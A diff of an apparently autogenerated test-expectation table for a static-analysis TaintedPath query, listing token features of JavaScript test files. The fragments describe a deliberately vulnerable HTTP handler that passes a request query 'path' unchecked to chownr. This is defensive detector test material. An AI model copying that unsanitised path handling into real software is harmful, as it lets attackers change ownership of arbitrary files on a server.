contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:32 | exceptional return of require("chownr") | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:32 | require("chownr") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:32 | require("chownr") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:45:16:45:32 | require("chownr") | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:45:24:45:31 | "chownr" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-access-paths.js:45:24:45:31 | "chownr" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:45:24:45:31 | "chownr" | calleeImports | | | autogenerated/TaintedPath/tainted-access-paths.js:45:24:45:31 | "chownr" | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-access-paths.js:45:24:45:31 | "chownr" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-access-paths.js:45:24:45:31 | "chownr" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:5:47:11 | server3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:5:47:11 | server3 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:5:47:11 | server3 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:5:50:2 | server3 ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:5:50:2 | server3 ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:5:50:2 | server3 ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:47:18 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:47:18 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:47:18 | http | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:47:31 | http.createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:47:31 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:47:31 | http.createServer | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:50:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:50:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:50:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:50:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:50:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:15:50:2 | http.cr ... T OK\\n}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:20:47:31 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:20:47:31 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:20:47:31 | createServer | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | chownr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | chownr | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | chownr | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | chownr | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | chownr | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | this | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | this | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | url | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:47:32 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | 'arguments' object of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | exceptional return of anonymous function | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | functio ... OT OK\\n} | calleeImports | http | @@ -10631,6 +84261,81 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | functio ... OT OK\\n} | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:33:50:1 | return of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:43:47:45 | req | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:47:48:47:50 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:47:48:47:50 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:47:48:47:50 | res | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:47:48:47:50 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:47:48:47:50 | res | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:10 | path | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:10 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:7:48:48 | path = ... ry.path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:16 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:16 | url | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:16 | url | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:22 | url.parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:22 | url.parse | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | exceptional return of url.par ... , true) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:37 | url.par ... , true) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:43 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:43 | url.par ... ).query | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:18:48:22 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:18:48:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:18:48:22 | parse | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:18:48:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:18:48:22 | parse | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:26 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:26 | req | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:26 | req | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:30 | req.url | calleeImports | url | @@ -10640,6 +84345,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:30 | req.url | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:48:24:48:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:28:48:30 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:28:48:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:28:48:30 | url | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:28:48:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:28:48:30 | url | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:48:33:48:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-access-paths.js:48:33:48:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-access-paths.js:48:33:48:36 | true | calleeImports | url | @@ -10649,6 +84359,31 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:48:33:48:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:48:33:48:36 | true | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:48:33:48:36 | true | receiverName | url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:39:48:43 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:39:48:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:39:48:43 | query | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:39:48:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:39:48:43 | query | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:48:45:48:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:48:45:48:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:48:45:48:48 | path | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:48:45:48:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:48:45:48:48 | path | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:8 | chownr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:8 | chownr | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:8 | chownr | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:8 | chownr | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:8 | chownr | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | chownr( ... rr) {}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | chownr( ... rr) {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | chownr( ... rr) {}) | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | chownr( ... rr) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | chownr( ... rr) {}) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | exceptional return of chownr( ... rr) {}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | exceptional return of chownr( ... rr) {}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | exceptional return of chownr( ... rr) {}) | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | exceptional return of chownr( ... rr) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:3:49:55 | exceptional return of chownr( ... rr) {}) | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:49:10:49:13 | path | CalleeFlexibleAccessPath | chownr | | autogenerated/TaintedPath/tainted-access-paths.js:49:10:49:13 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:49:10:49:13 | path | calleeImports | chownr | @@ -10673,6 +84408,21 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:49:27:49:35 | "somegid" | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | | autogenerated/TaintedPath/tainted-access-paths.js:49:27:49:35 | "somegid" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:49:27:49:35 | "somegid" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:37 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:37 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:37 | this | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:37 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:37 | this | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | 'arguments' object of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | exceptional return of anonymous function | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | function (err) {} | CalleeFlexibleAccessPath | chownr | | autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | function (err) {} | InputArgumentIndex | 3 | | autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | function (err) {} | calleeImports | chownr | @@ -10681,36 +84431,193 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | function (err) {} | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | | autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | function (err) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | function (err) {} | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:38:49:54 | return of anonymous function | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:49:48:49:50 | err | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:49:48:49:50 | err | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/TaintedPath/tainted-access-paths.js:49:48:49:50 | err | enclosingFunctionBody | req res path url parse req url true query path chownr path someuid somegid err | +| autogenerated/TaintedPath/tainted-access-paths.js:49:48:49:50 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:49:48:49:50 | err | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:0 | this | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:1:1:1 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:6 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:6 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:22 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:22 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:22 | fs = require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:5:1:22 | fs = require('fs') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:16 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:22 | exceptional return of require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:22 | exceptional return of require('fs') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:22 | require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:1:10:1:22 | require('fs') | 